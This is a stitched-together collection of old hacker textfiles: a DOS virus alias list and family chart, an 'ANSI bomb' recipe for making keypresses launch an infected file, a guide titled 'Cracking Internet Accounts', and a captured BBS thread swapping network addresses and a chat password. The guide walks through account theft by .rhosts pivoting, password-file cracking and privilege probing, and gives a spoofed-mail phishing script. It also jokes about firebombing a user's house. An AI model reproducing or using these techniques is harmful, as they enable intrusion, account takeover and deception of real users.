 Suomi                   1008
 Suriv 1.01              Suriv 1.01
 Suriv 2.01              Suriv 2.01
 Suriv 3.00              Suriv 3.00
 Suriv A                 Suriv 1.01, Suriv 2.01
 Suriv B                 Suriv 3.00
 Suriv01                 Suriv 1.01
 Suriv02                 Suriv 2.01
 Suriv03                 Suriv 3.00
 SVC V4.00               USSR 1689
 Sverdlov                Sverdlov
 SVir                    SVir
 SVir-A                  SVir
 SVir-B                  SVir
 Swap                    Swap
 Swedish Disaster        Swedish Disaster
 Swiss 143               Swiss 143
 Sylvia                  Holland Girl
 Sylvia 2                Holland Girl 2
 SysLock                 Syslock
 System Virus            Icelandic-II
 Taiwan                  Taiwan
 Taiwan 2                Taiwan
 Taiwan 3                Taiwan 3
 Taiwan 4                Taiwan 4
 Taiwan-B                Taiwan
 Tannenbaum              Christmas Virus
 Taunt                   AIDS
 Ten Bytes               1554
 The Plague              The Plague
 Time                    Monxla
 Time B                  Monxla B
 Tiny Family             Tiny Family
 Tiny Virus              Tiny Virus
 Tiny 134 Virus          Tiny Family
 Tiny 138 Virus          Tiny Family
 Tiny 143 Virus          Tiny Family
 Tiny 154 Virus          Tiny Family
 Tiny 156 Virus          Tiny Family
 Tiny 158 Virus          Tiny Family
 Tiny 159 Virus          Tiny Family
 Tiny 160 Virus          Tiny Family
 Tiny 163 Virus          Tiny Virus
 Tiny 169 Virus          Tiny Family
 Tiny 198 Virus          Tiny Family
 Toothless Virus         W13
 TP04VIR Virus           Vacsina
 TP05VIR Virus           Vacsina
 TP06VIR Virus           Vacsina
 TP16VIR Virus           Vacsina
 TP23VIR Virus           Vacsina
 TP24VIR Virus           Vacsina
 TP25VIR Virus           Vacsina
 TP33VIR Virus           Yankee Doodle
 TP34VIR Virus           Yankee Doodle
 TP38VIR Virus           Yankee Doodle
 TP41VIR Virus           Yankee Doodle
 TP42VIR Virus           Yankee Doodle
 TP44VIR Virus           Yankee Doodle
 TP45VIR Virus           Yankee Doodle
 TP46VIR Virus           Yankee Doodle
 Traceback               Traceback
 Traceback II            Traceback II
 Traceback II-B          Traceback II
 Traceback-B             Traceback
 Traceback-B2            Traceback
 Travel Virus            V2000
 Turbo @                 Turbo 448
 Turbo 448               Turbo 448
 Turbo Kukac             Turbo Kukac
 Turbo Kukac 9.9         Turbo Kukac
 Typo Boot               Typo Boot
 Typo COM                Typo COM
 UIUC Virus              Ashar
 UIUC Virus-B            Ashar
 Unesco                  Vienna
 UScan Virus             V2100
 USSR                    USSR
 USSR 257                Kemerovo
 USSR 311                USSR 311
 USSR 394                Attention!
 USSR 492                USSR 492
 USSR 516                USSR 516
 USSR 600                USSR 600
 USSR 707                USSR 707
 USSR 711                USSR 711
 USSR 830                Red Diavolyata
 USSR 948                USSR 948
 USSR 1049               USSR 1049
 USSR 1689               USSR 1689
 USSR 2144               USSR 2144
 V-1                     1253
 V-277                   Amstrad
 V-299                   Amstrad
 V-311                   USSR 311
 V-345                   Amstrad
 V-847                   Amstrad
 V-847B                  Amstrad
 V-852                   Amstrad
 V-Alert                 1554
 V605                    Anti-Pascal
 V651                    V651
 V800                    V800
 V800M                   V800
 V920                    DataLock
 V1024                   V1024
 V1226                   1226
 V1226D                  1226D
 V1226M                  1226D
 V1277                   Murphy
 V1302                   Proud
 V1521                   Murphy
 V1600                   Happy New Year
 V1701New                Evil
 V1701New-B              Evil
 V2000                   V2000
 V2000-B                 V2000
 V2100                   V2100
 V2P1                    1260
 V2P2                    V2P2
 V2P6                    V2P6
 V2P6Z                   V2P6Z
 Vacsina                 Vacsina
 VBasic Virus            5120
 Vcomm                   Vcomm
 Vera Cruz               Ping Pong
 VFSI                    VFSI
 VGA2CGA                 AIDS
 VHP                     VHP
 VHP2                    VHP2
 VHP-348                 VHP
 VHP-353                 VHP
 VHP-367                 VHP
 VHP-435                 VHP
 VHP-623                 VHP2
 VHP-627                 VHP2
 Victor                  Victor
 Vien6                   Vienna
 Vienna                  Vienna
 Vienna C                646
 Vienna-B                Vienna
 Vienna-B 645            Vienna
 Violator                Violator
 Violator B4             Violator B4
 Violator Strain B       Violator
 Violator Strain B4      Violator B4
 VirDem                  VirDem
 VirDem 2                VirDem
 Virus-90                Virus-90
 Virus-B                 Friday The 13th COM Virus
 Virus101                Virus101
 Voronezh                Voronezh
 Voronezh B              Voronezh
 VP                      VP
 W13                     W13
 W13-A                   W13
 W13-B                   W13
 Westwood                Westwood
 Whale                   Whale
 Wisconsin               Wisconsin
 Wolfman                 Wolfman
 XA1                     Christmas Tree
 Xmas In Japan           Christmas In Japan
 Yale                    Alameda
 Yankee 2                Yankee 2
 Yankee Doodle           Yankee Doodle
 Yankee Virus            Yankee 2
 Yankee-go-Home          Yankee 2
 Yukon Overwriting       Yukon Overwriting
 Z The Whale             Whale
 Zero Bug                Zero Bug
 ZeroHunt                ZeroHunt



PART IV.  Virus Relationship Chart


512 Virus       --> 512-B       --> 512-C       --> 512-D

1226            --> 1226M       --> 1226D

4096            --> 4096-B      --> 4096-C
                --> Fish        --> Whale

Alameda         --> Alameda-2
                --> Golden Gate --> Golden Gate-B --> Golden Gate-C
                --> SF Virus

Anti-Pascal     --> AP-529      --> AP-400      --> AP-440      --> AP-480

        Note: AP-480, AP-440, and AP-400 are grouped together in the listing
              as Anti-Pascal II

Blood           --> Blood2

Brain           --> Ashar
                --> Clone
                --> Chaos
                --> EDV

Cascade/1701    --> 1701-B
                --> 1704        --> 1704 Format
                                --> 1704-B
                                --> 17Y4
                                --> Cunning

Datacrime       --> Datacrime-B
                --> Datacrime II --> Datacrime IIB

Do-Nothing      --> Saddam

Fri 13th COM    --> Fri 13th-B  --> Fri 13th-C
                --> Virus-B

Happy New Year  --> Happy New Year B

HM2           --:               --> Plastique COBOL
                --> Plastique   --> Plastique 4.21      --> Plastique 5.21
Jerusalem B   --:                                                :
                                                                 V
                                                            Invader

Holland Girl    --> Holland Girl 2

Icelandic       --> Saratoga
                --> Iceland II  --> Icelandic III
                                --> Dec 24th
                --> Mix1        --> Mix1-B

JoJo            --> JoJo 2

Kennedy         --> Tiny 163

Leprosy         --> Leprosy-B   --> The Plague
                --> Leprosy-C

MG              --> MG-2        --> MG-3

Murphy-1        --> Murphy-2

Ohio            --> Den Zuk

Perfume         --> Sorry

Phoenix         --> PhoenixD
                --> Evil-B      --> Evil

Ping Pong       --> Ping Pong-B  --> Ping Pong-C
                --> Big Italian
                --> Typo
                --> Print Screen --> Print Screen-2
                --> Ghostballs

Pixel           --> Amstrad     --> V-847B
                                --> V-852
                --> V-345       --> V-299       --> V-277

Polish 217      --> Polish 217 B

Rape-11         --> Rape-11

Stoned          --> Stoned-B    --> Rostov
                                --> Sex Revolution v1.1 --> Sex Revolution v2.0
                                --> Stoned-C
                                --> Stoned-D
                                --> Stoned-E
                                --> Stoned-F
                                --> Stoned II

Suriv 3.00      --> Jerusalem   --> Fu Manchu   --> Taiwan 3
                                --> Jerusalem B --> New Jerusalem
                                                --> Payday
                                                --> Sunday      --> Sunday-B
                                                                --> Sunday-C
                                                --> Jerusalem C
                                                --> Jerusalem D
                                                --> Jerusalem E
                                                --> Jerusalem F (Spanish)
                                                --> 1720/PSQR
                                                --> 1210/Prudents
                                                --> Frere Jacques
                                                --> Anarkia     --> Anarkia-B
                                                --> Slow
                                                --> Westwood
                                                --> 1605
                                                --> Park ESS
                                                --> Skism-1
                                                --> (also see HM2 above)
                                                --> Discom

Syslock         --> Macho       --> Macho-B
                --> Advent
                --> Cookie

Tiny-198        --> Tiny-167
                    --> Tiny-160
                        --> Tiny-159
                            --> Tiny-158
                                --> Tiny-156
                                    --> Tiny-154
                                        --> Tiny-143
                                            --> Tiny-138
                                                --> Tiny-134
                                                    --> Tiny-133

        Note: The Tiny-nnn Viruses indicated above are grouped together in
              the listing as "Tiny Family".  The Tiny-163 virus is not
              related to the above group of viruses.

Traceback II    --> Traceback   --> Traceback-B --> Traceback-B2
                --> Traceback II-B

V1024           --> Dark Avenger --> V651
                                 --> V800       --> V800M
                                 --> V2000      --> V2000-B
                                                --> V2100

Vienna          --> Father Christmas
                --> Lisbon
                --> Ghostballs
                --> 1260        --> V2P2        --> Casper
                                                --> V2P6        --> V2P6Z
                --> W13/V-534   --> W13-B/V-507
                --> Wien (Poland)
                --> Vien6
                --> Vienna-B    --> Vienna-B 645
                --> Violator    --> Violator B4
                                --> Grither
                --> VHP-348     --> VHP-353     --> VHP-367     --> VHP-435
                --> VHP-623     --> VHP-627
                --> Iraqui Warrior

        Note: VHP-348, VHP-353, VHP-367, and VHP-435 are listed as VHP.
              VHP-623 and VHP-627 are listed as VHP2.

Virus-90        --> Virus101





PART V  Personal Observations


  Section A: The All Powerful Ansi-Bomb
  

     The ANSI bomb is one of the most elusive ways to introduce one of your
  nasty microorganisms to an unsuspecting system.  It could be hidden in the
  comments or just renamed to a different file; but, by far, the most unre-
  lentful ways to infect a system is via the remapping of a keyboard.  For
  instance, you have an infected file that you just renamed to README.COM.
  Now create a zip comment file that looks something like this:

    [65;82;69;65;68;77;69;46;67;79;77;13p

  Which traslates to this:

     'A' remapped to  'README.COM'<enter>

  Basically, I just remapped ASCII character 65, the Uppercase 'A', to
  README.COM<enter>.  Say la....

  Make sure you put this character,

       

  before the '['.  The reason why I didn't do it here is because I didn't
  want to remap YOUR 'A' key to 'README.COM'<enter>  :)

  When the user hits the 'A' key instead of getting an 'A', he/she will get
  'README.COM' followed by a <return>.  Thus completing our objective of
  the execution of the infected COM file.  The most effective way, would be
  to write your own virus, which would be undetectable, AND to remap all of
  the keys to execute README.COM. Now, all you have to do is create a ZIP
  file and add the ANSI bomb as a comment.  NOTE: You have to be careful
  not to add it as an ASCII comment. Another way would be to conceal the
  ANSI-Bomb in a BBS.AD and just hope the user type it out.

  Well, man, have fun with this shit...



  I can be contacted on my board:

  STeALtH TeCHnOLoGiEs:  504-PRI-VATE  NUP: PAKISTANI

  or on:

  PHORTRESS SYSTEMS IV:  602-PRI-VATE
  Cybernet504 - 1     :  504-272-1710


                - Dr. C -



EnD Of FiLE




                |                              |
               ||  CRACKING INTERNET ACCOUNTS  ||
               ||        By:  A. Uzziah        ||
                |                              |
                 

Disclaimer:
     I am in no way responsible for destruction of property or
destroyed lives, etc, consequential or inconsequential.  This file
is for informational purposes only.  Know ye that account cracking
or piracy is illegal.


Background:
     The Internet (also called Inet) is a world-wide computer
network.  There are hundreds of thousands (literally) of
university, government, research, commercial, and foreign computers
accessible from the Internet.  The Internet ties smaller networks
like Bitnet, Sprintnet (used to be called Telenet), Tymnet, etc,
together.  That's why you can send mail to someone on a different
network than you.  To really get any use out of this, you need an
account.  An Internet account has nothing to do with money, it's
just a login and a password to a machine, and a personal directory
on that machine's hard disk.  Your hard disk space is also called
a disk quota, and ranges from zilch to unlimited, depending on the
machine and your privileges.  It'll usually run about 1 to 4 megs,
but for instance I was once using an account with 154 megs free
disk space.  Accounts are given to university students (though it
depends on your university and major), certain government
employees, generally just people who work for companies that can
afford it and have real business being on the Inet.  Your average
juvenile cyberpunk though has no legitimate reason to be using the
Internet, and may find it difficult to acquire an account.  This
is a basic guide to account theft.

BASIC COMMANDS
     Ok remember that Unix is case sensitive, so all commands must
be typed in lower case.  Also, directory structure is like that of
DOS, but instead of the backlash (\), UNIX USES THE FRONTSLASH (/). 
It will consider \ a null character.  
     Unix uses the * as a wildcard, but it differs from DOS.  Take
the DOS expression "com*.*".  In Unix you would only need to type
"com*".  Also, unix files can have any number of extensions
("this.is.a.legal.unix.file.name")

 COMMAND            DESCRIPTION
 man [command]      This is like a help feature.  It stands for
                    manual, and will call up detailed help for a 
                    particular command.
 ls                 List files.  equivalent of 'dir'.  Try 
                    "ls -l|more" for a full listing with page 
                    pausing (|more).
 cp [files]         Copy.  Works like the DOS command, but a
                    destination must be specified.  You can copy
                    directories with cpdir. 
 rm [files]         Delete.
 mv [file/s] [dest] Moves files.  You can also mv directories with
                    the mvdir command.
 cd                 Change directory.  Just like DOS.
 finger             See who's logged into the machine.
 cat                Equivalent to the "type" command.
 telnet [sitename]  Lets you remotely log into a site.           
 rlogin [sitename]  Like telnet, but has some different options.
 df                 Disk free shows space remaining for your disk
                    block.
 mail               Check mail.

     This isn't really designed as a Unix tutorial; for more
detailed information you should spend some time playing with the
man feature and the OS or get a book.

ADDRESSES AND ACCOUNT NAMES
     Every site on the internet has an address and an IP number
unique to it.  An address is something like
"lemcon1.yuz.uchicago.edu" and an IP number is a number like
"129.57.5.78".  Some systems will only accept the IP number as a
mailing address or telnet destination.  A mailing address is a
login and a site--"login@the.site.name".


PROCEDURE

1.   You first need access to the Internet.  This can come from
existing accounts, a dial-in, or a machine that you can call.  If
you can borrow/steal/use an existing account, it may be possible
to go directly to the lab or wherever your account is and use a
terminal.  Or you call a dial-in and from there connect to the site
you wish to use.  Sometimes a specific machine will have a dial-in
that you can call, which will connect you directly to that machine.
     To get an existing account, bug a friend of yours who's in
college.  A lot of computer science people are actually pretty
ignorant, and don't know that they use Internet.  Just ask if they
are using some kind of university network or something.  If they
say that they do use one, they probably have an account on the
Internet.  Then just go to the lab and use a terminal.
     To find out a dial-in number, call the college and ask if they
have a computer network and how to access it.  Try not to sound
like a freak. 
     If you dial directly to a machine, you will usually only be
able to use that machine, but sometimes you can enter "telnet" or
"rlogin" at the login prompt and connect to other sites.

2.   After you've figured out how to access Inet services, you
generally need an account to generate more accounts (there are
other ways which I will go into later).  To use an account you need
a login and a password.  In the above example my address was
"dementia@gerber.UCLM.edu".  After connecting to my local network
I might type (the exact commands vary):
gerber.UCLM.edu [that's the site i want to connect to]
[Here i would see a unix version number and some maybe some other
garbage, then i would see..]
login:               [i type "dementia"]
password:            [and of course i would type a password.]

From there I might be asked to select a terminal type or something
else trivial, but for all purposes I would be in the account.

3.   The first order of business is to check and make sure the
legitimate user who's account you're using isn't already logged in. 
Type "finger".  You should get a list of users, and if the login
you are using shows up more than once, hang up quick.  But if the
account has been idle for several hours, then the user is probably
gone off and left processes running, and if you work quickly you
may be able to get out before they get back.

4.   Once you have gotten comfortable with the environment, check
for an ".rhosts" file ("cat .rhosts").  This is a hidden file in
the user's directory that will allow other users in a different
account to log in--without the password.  The .rhosts file is laid
out like this--
[this is sangeat@bleys.gm.org's .rhost file]

hardy.u.washington.edu buddy   
genera.bleh.UCM.edu loser            
jizzrea.insanus.mceg.com fryme 
     \_____________/      |
         |                |
          \                \
          sitename          login

Ok, example time.  I am using buddy@hardy.u.washington.edu's
account.  The above .rhosts file is on sangeat@bleys.gm.org.  From
buddy's account I would type
"rlogin bleys.gm.org -l sangeat"
Sangeat's computer knows when I try to connect that my login is
buddy, and since buddy is in the .rhosts, I connect.  The exact
commands vary because there are scads of Unix variants.
     The uses of an .rhosts file a obvious.  Say you want to trade
files with someone, but don't want to give them your password, or
you just stuck your friend in so that he could use your account,
etc.  Think about this for a second though.  If sangeat puts buddy
in his .rhosts, then buddy might have put sangeat in his.  So, when
you get a new account, check the .rhosts file and try to connect
to everyone in the local file, because if they're your's, there's 
a good chance that you're in theirs.
     If you get into one of those remote accounts, then check the
remote account's .rhosts, and repeat the process...
     Be sure and grab the /etc/passwd file on all the machines that
you happen to get into.

5.   Check the mail, and read the mbox and dead.letter files.  Find
out who your victims friends are and try logging into their
accounts.  If you judge that your victim is friendly enough with
someone, you can try mailing the someone and asking for a passwd
so that you can "give them a file".

6.   There is a chance that you will be caught.  Often, you will
be locked out but your account will remain.  In other words, your
files will be still be there, but your login will be refused.  You
can still get your files if you took have a second account on that
machine and set up a suid system BEFORE HAND.  Here is how a suid
system works.  When you create, mv, or cp a file, you become the
owner of that file.  Under normal circumstances, you are the only
person (or anyone using your account!) that can delete or view
these files because your user ID is unique.  But, say you wanted
grinch to be able to view a certain file named GLOTA.TXT.  If you
had write permission to their directory, you could copy /bin/cat
to their directory and type 
"chmod a+s ~grinch/priv.cat".  The file would still show up as
being owned by you, and when executed, the user who executed would
temporarily assume your ID (that's what the chmod a+s does).  
Grinch would type "priv.cat ~[your login]/GLOTA.TXT".  This will
work with any command.  You could do this with the move command,
and place suid mvs in two different accounts so that if one went
down you could get the files from the other.  If you don't
understand, don't worry about it.
     Incidentally, if you are trying to hack root priveleges,
here's a list of default suid files for System V which you can
check for writeability.
/bin/su             /bin/df             /bin/newgrp
/bin/passwd         /usr/bin/ct         /usr/bin/cu
/usr/bin/disable    /usr/bin/enable     /usr/bin/login
/usr/bin/lpstat     /usr/bin/shl        /usr/bin/uucp
/usr/bin/uuname     /usr/bin/uustat     /usr/bin/uux
/usr/bin/mailq      /usr/lib/accept     /usr/lib/acct/accton
/usr/lib/lpadin     /usr/lib/lpmove     /usr/lib/lpsched
/usr/lib/lpshut     /usr/lib/reject     /usr/lib/sa/sadc
/usr/lib/uucp/uccico     /usr/lib/uucp/uusched
/usr/lib/uucp/uuxqt


7.   Check to see if any of your accounts support the "setname"
command.  This lets you change your login.  This in conjunction
with the chfn command will give you an almost entirely new
identity.  Your User ID is the only thing you can't change.  If you
do use setname, you may be unable to rlogin through .rhosts any
longer, and mail will not be forwarded.
     If the account has not been used for sometime, it would
probably be best for you to change your login.  It really sucks
when you are using someone's account and you're paged by one of
their friends.  If someone is still using it and you change the
login, when the real user is unable to login, they are going to
call the sys-admin.


/ETC/PASSWD
     The /etc/passwd file is a file that every unix machine has. 
This file contains all information about of the user, including
password.  The file is readable by anyone, but the password is
encrypted.  Passwords are encrypted using DES standard.  The
encryption is unbreakable, but you can get dirty little programs
to get around that.  It works like this:
In a passwd file of say, 500 users, there will be some people with
simple passwords.  Of course, you're not going to go through
guessing passwords, your program does that for you.  What the
program does is it takes a list of words, maybe 200, which are
commonly used as passwords.  It then encrypts a word off the list,
using the DES encryption standard, and checks to see if the
ENCRYPTIONS match.  If the encryptions match, then the words are
obviously the same.  You will snag only those accounts which are
poorly protected.  Natural selection.
     Occasionally you will run into a shadowed password file. 
Where the encrypted password normally resides will be an '*'.  The
passwords are stored in a different, unreadable (to you at least)
file.  You can't crack these.  Ain't no justice.
     You can get passwd crackers from any good BBS or just off
sites on the Internet (paradoxical isn't it?).
     If you don't want anyone to crack your password you throw in
a bunch of capitals in the middle of the word, or numbers, etc.

PLAYING WITH THE MAILER
     This is one of my favorite tricks for some reason.
     When mail is sent, the mail program connects to port number
25 of a system and delivers the message.  What's really neat is
that you can do this too.  Here's how it works..
     Your target is prey@crack.me.please.  First you telnet to port
number 25 of the site with the command 
"telnet crack.me.please 25".  You will get a brief message.  Type
"HELO crack.me.please".  The remote site should respond.  Then type
"MAIL FROM: root@crack.me.please"  You should get an OK.  Next type
"MAIL TO: prey@crack.me.please"  Again, you should get an OK. Next,
"DATA"  You will be told to enter a message and end with a "."
Enter something along these lines...

"Due to a recent series of dictionary hacking attempts, all users
will be required to temporarily change their passwords.  Your
account will automatically be expired if you do not comply within
24 hours of reading this message.  Your new password is 
jY2s!in@
I am sorry for the inconvience, but you may not change your
password until further notice.  Please mail me only if you believe
your account has already been broken into; this is a system wide
policy and I do not have time to read a message from every user. 
To change your password, type:
"passwd"
Then enter your old password when it asks (you will not see the
characters you are typing), and enter
jY2s!in@
as your new password.
Thank you."

When you are finished, type a ".", then "quit".  Be sure that when
you are typing the header info that you do not make any mistakes
since the remote system will not recognize a backspace correctly. 
Also, it will say in the header of the message 
"RECIEVED FROM:  [whatever address you are using]".  But if the
user is dumb enough to change their password on the basis of a mail
message, they probably aren't going to notice this.
     You can also use this trick to send mail to friends if you
don't have an account, or you can get your jollies freaking people
out with messages from the White House or the KGB.               
                                
                          
OTHER TIPS--

EXPLOIT THE PEOPLE FACTOR
     Remember that a system can never be anymore more secure than
its users are.  Get to know people, be friendly, help out new-
users.  While the system may appear uncrackable, an ignorant user
can let drop a hint.  Inside info can really simplify things.
"Be good to others; there's something in it for you."
                                         -- The Tick
     Try calling the computing services department and milk the
operators for all they're worth.  They usually don't know anything
about computers and even less about security--they just work there.

EXPLOIT ON SITE NEGLIGENCE
     Some computers are damn near impossible to get into remotely
because of down links, or oneway security (You can go out from the
computer, but can't get in).  These computers are great targets
because they are often research type machines with good processors,
few users, and gigs of disk space.  All the remote security in the
world is useless if you can walk into the lab and log right onto
the machine--and 9 times out of 10, you can.

ACT LIKE YOU BELONG
     Anytime you are messing around in a graduate lab or somewhere
you're not supposed to be, act like you belong.  Most of the other
people in there aren't going to care because they will be busy
themselves.  If you look busy and at home no one will question you. 
If you look nervous and out of place, someone will start bugging
you.  Think of an alibi BEFORE hand and get all the details
straight in your mind.  This way if someone questions you, you can
be ready with a quick answer.

BLEND INTO THE ENVIRONMENT
     On a system where almost every user appears normal, with
normal names and no plans, don't chfn to "!!k-c00l c0dez kid!!" and
stick your favorite Venom lyrics in the .plan file.  Seem like any
other user.  In fact, you can even go as far as to chfn to "MARK
L. WAGNER", or something in all-caps so that you look like an
illiterate new user.  Also you might wish to change to a female
name because sys-admins aren't likely to suspect female crackers.
     Also, don't wantonly destroy system files or break into a
system so that you can crash it!  If you have a personal vendetta
against a user or something, firebomb his house, because crashing
a machine for the sake of crashing it is really stupid.  

LOCATE OTHER MISCREANTS
     Find other deviant minds and share your information.  Be
careful though who you tell because if too many people start using
one dialout/in then someone will notice and close it up, and
remember that Big Brother is Watching. ========
Phile 12
========
The following is a capture of the posts on Lutzifer as of 10/06/91...
--------
Message 1
From gandalf at 03:44:36 on Sun Jun  9
Subject: test

yea yea yea

=========================


Message 2
From lutz at 15:59:47 on Sun Jun  9
Subject: new bullet

hiya all !
wonderful things happened l8ly !
gand wrote a new, more secure version of
bullet, so all users will b able to discuss again !
many thanx to him

Lutz

=========================
Message 3
From anduril at 22:11:17 on Sun Jun  9
Subject: Linz NUA

Hi all !

I'm very glad to have a bullet again, thanx to gand and lutz !


I'm desperatly searching for the NUA of the IBM-mainframe of
the University of Linz ( Austria ).
I need to access it via the Aconet.

/Anduril

=========================
Message 4
From danhackr at 22:40:41 on Sun Jun  9
Subject: Back Again

Love You, gandy! :-)

=========================

Message 5
From wandii at 03:36:55 on Mon Jun 10
Subject:

oops, you forgot to take the shell escape out!

=========================

Message 6
From tchhacky at 04:35:50 on Mon Jun 10
Subject: Awesome

Thanks gandalf.. and anyone, does anyone know what the address 26245490040004 is
 to? obviously a Unix, but I mean, who owns it? Thanx in advance. Tchhacky.
email me or reply via bullet.

=========================


Message 7
From tchhacky at 04:37:47 on Mon Jun 10
Subject: oops

that was 26245890040004. thanx

=========================
Message 8
From equal at 04:38:15 on Mon Jun 10
Subject: Cool!

very good gandalf!  thanks for putting it back up!

=========================

Message 9
From gandalf at 04:46:51 on Mon Jun 10
Subject: altger!

altger's at 26245890040004 m8, like this place sort of
login as guest or whatever

=========================

Message 10
From mordor at 16:41:07 on Mon Jun 10
Subject: Burp!

ooooooohhh I loooooveeeee you gandalf !!!!!!!
Here ave a bunch of roses xxx 0000 xxx

=========================

Message 11
From mordor at 16:44:11 on Mon Jun 10
Subject: SCO UNIX

As you are an expert on unix gand, you couldnt tell me where I could

get hold of some unix software, any would be much appreciated, as I have SCO
SCO UNIX SYSTEM V and I need some guidance and bulletin board software
az im starting up a multi line BBS in the uk....
Cheers .... /\/\ordor

=========================
Message 12
From anduril at 17:53:45 on Mon Jun 10
Subject: X11 -spy

Hi all !

I've been told that if you can connect to any X11 server, you

can tell it to send you all keystrokes.
This is of course a BIG security gap.

Has anyone programmed a spy ??
ne1 experience with hacking using X11 ?

/Anduril

=========================

Message 13
From galileo at 19:57:30 on Mon Jun 10
Subject: Well done

Cheers for the good job ol' chap
Nice one indeed.

The_Phuckin_Star_Gazer.

=========================

Message 14
From heartz at 00:03:12 on Tue Jun 11
Subject: good

stuff, glad to see it back.

  h.

=========================
Message 15
From gandalf at 00:45:29 on Tue Jun 11
Subject: x11 hacking

Erm, theres no security with X11 at all - either you can connect to
the server's socket in /tmp/.X11-unix/X0 (usually) or its inet
domain socket on port 6000 and fuck with some1 elses server.
xhost provides some protection tho as does xauth.

On most systems you can steal a copy of the screen as the
frame buffer (/dev/fb) is left 666 even when some1 is usin it..

=========================

Message 16
From danhackr at 00:54:50 on Tue Jun 11
Subject: Mail lists

Someone posted here a few months ago infos about how to subscribe
to mailing list like Phrack etc...
Could you pse post again the address to write to? tnx.

=========================

Message 17
From burntkid at 03:54:19 on Tue Jun 11
Subject: Thanks

Thanks for putting up the bulletins it's been a long time but now finally there
back up thanks gandalF!
gregreets from amitech
BK

=========================

Message 18
From goldhawk at 14:48:34 on Tue Jun 11
Subject: chat

    Call this chat.
hp800.lasalle.edu 1234
pw=hack
dude on qsd just gave it to me.

=========================

Message 19
From boris at 20:50:57 on Wed Jun 12
Subject: hi all

Thanks Lutz and Gand for putting the bullet back up!
Been missing it pretty bad...

cheers, Boz

=========================

Message 20
From feoh at 06:32:41 on Thu Jun 13
Subject: GS/1's

Sorry about that last post :( but I forgot that x25 kill's
you if you hit a backspace! :-)
*MANY* THANKS To gandalf for putting this back up
and hey, try the chat that's built into our DikuMUD
goldman.gnu.ai.mit.edu port 4000

=========================

Message 21
From canine at 06:33:50 on Thu Jun 13
Subject: UNIX BBS

Mordor,
        Get some BBS software at 718-897-2521

        Tell them I sent ya, they have XBBS, maybe some others.


                                Canine

=========================

Message 22
From canine at 06:37:17 on Thu Jun 13
Subject: ok!

        Thanks for putting bullet back up!  This place isnt the same without it.


                                Canine

=========================

Message 23
From gandalf at 08:05:39 on Thu Jun 13
Subject: goldman.ai.mit mud

does wing still have anything to do with that?
or have they fucked him off after him destroying mit and
causing it to be shutdown for every1 else?
(yes i do have evidence!)

=========================

Message 24
From feoh at 09:06:00 on Thu Jun 13
Subject: re: wing

No wing *forced* his way into our MUD. he made a few good
contributions while he was there .. and then he suddenly bowed
out vvoluntarily.. who knows.

=========================

Message 25
From mordor at 12:16:43 on Thu Jun 13
Subject: Unix bbs

Cheerz m8 much appreciated !
It'll cost me a bomb to call there, but i neeed the software
bbfn and fanx again !

/\/\ ordor

=========================

Message 26
From blammo at 06:34:03 on Fri Jun 14
Subject: NUAs

does anyone have any NUAs in really outback places?

like:

anywhere in africa
anywhere in the middle east
anywhere in asia

also, some not-so-outback places in there like japan, korea, china, etc.

thanx, midnite.

=========================

Message 27
From mordor at 12:12:11 on Fri Jun 14
Subject: The otbacjk

Must of the coutries you suggest have trouble getting an acient telecoms
system to work properley, never mind x25 lines !!!! I jk know I have
been in many of these countries !!
Africa (Sotuth Africa)
                       & Parts of Japan have x25 lines but as for hi-texc
outfidials forget it!
Find yourself a global outdfioal !
/\/\ordor - Ive been workin in ng nigeria recently You should see that
telecoms system, - your luck if you can call next fucking door !!!!

=========================
Message 28
From blammo at 18:45:16 on Fri Jun 14
Subject: outback

i have plenty of global ODs...i was just wondering if anyone had NUAs in
any of those countries..i wanna scan them a little. i know japan, china, korea,
south africa, singapore, and other countries around there have x25 networks.

i would imagine india does, and probably egypt too. most middle east countries
could easily afford one, so some of them probably have networks.
i already have singapore and s. africa..and 1 in japan, but that one doesn't
work...

=========================
Message 29
From gauloise at 20:20:12 on Fri Jun 14
Subject: Uni of Card.

Does anybody know the NUA of the University of Cardiff?
I need it real bad .
thanx from the cigarrette.


=========================
Message 30
From gandalf at 20:28:38 on Fri Jun 14
Subject: cardiff

what machine at cardiff? their multics?  maybe its jan
                                                      et address
is all u need if u wanna connect - dunno if n e of their stuff is
on x25 2 - but u could check out the janet news machine
n e way which could tell u addresses etc

=========================

Message 31
From gandalf at 22:06:42 on Fri Jun 14
Subject: internet anon ftp

if n e 1 doesnt yet know about this -
if ur lookin 4 n e thing specific, u can use `archie' to search
for it.  telnet to quiche.cs.mcgill.ca (132.206.2.3 or 132.206.51.1)
login as archie.  then u can type help.

=========================
Message 32
From heartz at 23:12:35 on Fri Jun 14
Subject: other nets

Blammo-

   I think I have a couple nua's for som
                                        e other networks
that you're looking for, I've got S. Afr. somewhere, gimme
a day, I'll look for it, but I hope soviet will be fine for now.

[2502]xxxxxx

040300
030500

  I believe they still work, try them.

   heartz.

=========================
Message 33
From kaleidox at 09:46:17 on Sat Jun 15
Subject: outback

You might try the chat at 440881807401...it isn't new or great, but
it's in Hong Kong...


=========================


Message 34
From blammo at 18:38:26 on Sat Jun 15
Subject: NUAs

heartz-
thanks..i have 2 in s. africa already, so don't worry about those..
unless you have them laying around..
i'll check the soviet ones out.
-midnite

=========================

Message 35
From blammo at 18:39:43 on Sat Jun 15
Subject: nua ii

thanks kal..mainly, i'm just looking for full NUAs, so i can scan..
i have a bunch of DNICs, but i needed to know the length of the full
NUA in order to scan.
-midnite


=========================
Message 36
From heartz at 00:20:45 on Sun Jun 16
Subject: Yeah

Understandable, I made up a dnic list and have been fitting
in the NUA formats...it's not easy, but it's informative.
ie:
DNIC|NUA Format
____|_______________
3020|3020xxxxxxxxyy   |Datapac       |Canada

some got cut but it's Network Name and then Country.
good luck on the S. Africa.

btw: the 4408 chat is Kamome in Japan.

  heartz.

=========================

Message 38
From galileo at 22:50:28 on Mon Jun 17
Subject: S_Africa X25

Well,
I have called a few places in S_Africa on a nua, and
I usually got jolly good connections!
One of them was a unix that even had a Korn Chat.

Galileo (The Phukin Star_Gazer)

=========================

Message 39
From galileo at 22:54:43 on Mon Jun 17
Subject: Cardiff

Cardiff?
Lemme see... this mite be outa date but nuas should
be the same...

2342 2223 6163
2342 2223 6163 00

Hope they werk ok for you.

Gali (The_Phukin_Star_Gazer)

=========================

Message 40
From gauloise at 00:32:10 on Tue Jun 18
Subject: Tymnet-NUA

I am desperately lookin fer the R-Nua for Tymnet in Germany.
45611040250 doesn't work anymore.
HELP !!!

=========================

Message 41
From anduril at 10:25:30 on Tue Jun 18
Subject: Leoben - Hack

Hi all !

I heard that a hacker broke into the computers of
Leoben University, Austria doing quite a damage.

Any1 knowing more about that ?

/Anduril

